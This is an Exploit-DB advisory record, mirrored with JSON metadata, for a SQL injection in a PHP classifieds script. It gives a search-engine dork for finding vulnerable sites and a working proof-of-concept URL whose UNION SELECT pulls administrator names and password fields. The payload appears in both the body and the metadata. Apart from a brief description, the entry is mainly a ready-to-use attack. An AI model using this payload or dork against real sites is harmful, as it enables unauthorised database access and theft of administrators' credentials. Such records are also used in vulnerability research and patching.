Search...

Classifieds Script type Remote SQL Injection Vulnerability

2009-12-30T00:00:00

ID EDB-ID:10833
Type exploitdb
Reporter Hussin X
Modified 2009-12-30T00:00:00

Description

Classifieds Script (type) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            Classifieds Script (type) Remote SQL Injection Vulnerability

|    Author: Hussin X
|
|    Home :  www.iq-ty.com&lt;http://www.iq-ty.com&gt;
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
| d0rk : inurl:"showcategory.php?type"


POC :

http://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--


#end

IQ-SecuritY FoRuM

JSON Vulners Source

Initial Source

{"published": "2009-12-30T00:00:00", "viewCount": 1, "lastseen": "2016-02-01T13:16:13", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "hash": "0188be2c6036c3759eddfdeb935fb1a6850a223f34dc406f0f16cd7a69a05f48", "sourceHref": "https://www.exploit-db.com/download/10833/", "href": "https://www.exploit-db.com/exploits/10833/", "osvdbidlist": [], "description": "Classifieds Script (type) Remote SQL Injection Vulnerability. Webapps exploit for php platform", "references": [], "title": "Classifieds Script type Remote SQL Injection Vulnerability", "reporter": "Hussin X", "history": [], "edition": 1, "id": "EDB-ID:10833", "sourceData": "Classifieds Script (type) Remote SQL Injection Vulnerability\r\n\r\n| Author: Hussin X\r\n|\r\n| Home : www.iq-ty.com<http://www.iq-ty.com>\r\n|\r\n| email: darkangel_g85[at]Yahoo[DoT]com\r\n| d0rk : inurl:\"showcategory.php?type\"\r\n\r\n\r\nPOC :\r\n\r\nhttp://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--\r\n\r\n\r\n#end\r\n\r\nIQ-SecuritY FoRuM\r\n", "bulletinFamily": "exploit", "modified": "2009-12-30T00:00:00", "type": "exploitdb", "enchantments": {"vulnersScore": 6.1}}